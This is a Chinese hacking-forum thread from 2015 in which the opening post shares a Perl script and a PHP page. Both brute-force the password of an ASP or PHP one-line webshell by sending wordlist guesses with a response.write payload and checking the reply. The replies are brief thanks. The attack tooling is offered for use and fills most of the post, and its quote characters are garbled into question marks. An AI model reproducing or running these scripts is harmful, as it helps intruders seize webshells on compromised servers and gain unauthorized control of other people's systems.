查看: 16023|回复: 26

ASP&PHP一句话木马密码破解的破解脚本,很黄很暴力.

[复制链接]
  • TA的每日心情

    2016-11-18 02:49
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-3-15 20:05:55 | 显示全部楼层 |阅读模式

    #/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Request;
    use LWP::Simple;
    print ?=========================\n?;
    print ?\n?;
    print ?crack.pl Url\n?;
    print ?\n?;
    print ?crack.pl http://www.xxx.com/1.asp\n?;
    print ?\n?;
    print ?Made By Cond0r QQ 2304747789\n?;
    print ?\n?;
    print ?=========================\n?;
    print ?\n?;
    print ?Url Is :?;
    $ul=<STDIN>;
    chomp $ul;

    open PASS,?pass.txt?;
    $a=0;
    foreach $pass (<PASS>)
    {
    @pass[$a]=$pass;

    $a++;
    $ua = new LWP::UserAgent;
    $text=?\?QQ2304747789\?";
    $url=$ul.???.$pass.?=response.write(?.$text.?)?;

    $req=new HTTP::Request(?GET?,$url);
    print $rep;
    $respond = $ua->request($req)->as_string;
    print   ?The Pass Is:?.$pass  if($respond =~ /QQ2304747789/);

    }

    破解PHP一句话密码 PHP版

    <?php
    /*
    * Created on 2010-11-4
    */
    set_time_limit(0);
    $url = $_GET['url'];
    $passfile = $_GET['upfile'];
    $keyword = ?xxoo?;                      //关键字,改不改一样,因为判断的不是内容,而是http返回的内容长度

    $c_l = get_headers($url,1);             //获得正常http头的内容长度
    $normal_c_l = $c_l['Content-Length'];

    if($url && $passfile && $keyword) {
    $fp = fopen($passfile,r);
    while(!feof($fp)) {
    $pass = trim(fgets($fp));
    $all_url=$url.???.$pass.?=response.write(?.???.$keyword.??)?;
    $head_msg = get_headers($all_url,1);
    if($head_msg['Content-Length'] >$normal_c_l) {      //内容长度大于正常的就是keyword写入了,密码就出来咯
    echo ?<font color=red>破解成功,密码是:$pass</font>?;
    exit();
    }

    }
    fclose($fp);
    }

    ?>
    <html>
    <head>
    <title>asp一句话暴力破解</title>
    </head>
    <body>
    <form action=? method=?get?>
    <table>
    <tr>
    <td>一句话地址:</td>
    <td><input type=?text? name=?url? value=?http://127.0.0.1:81/2.asp? /></td>
    </tr>
    <tr>
    <td>密码文件:</td>
    <td><input name=?upfile? type=?file?></td>
    </tr>
    </table>
    <input type=?submit? name=?submit? value=?提交?/>
    </form>
    <p>说明:不是用获取页面内容,再判断关键字的方法。那样在一个大量数据的网页可能会很慢。</p>
    <p>这里用的是判断http头的Content-Length的方法,如果密码匹配成功,则response.write就会成功,页面内容就比原来多了</p>
    <p>思路就是这样!</p>
    <p>php不能多线程,速度大概是1000个密码15-20秒</p>
    <body>
    </html>

    回复

    使用道具 举报

  • TA的每日心情
    开心
    2024-9-4 21:14
  • 签到天数: 277 天

    [LV.8]以坛为家I

    发表于 2015-3-17 15:46:30 | 显示全部楼层
    不知道有用米用 先收着了   
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 18:30:28 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 11:42:47 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-29 12:10:55 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 19:17:54 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 03:00:00 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-7-2 18:00:56 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-7-3 06:12:27 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-4 08:56:43 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 17:17 , Processed in 0.028689 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部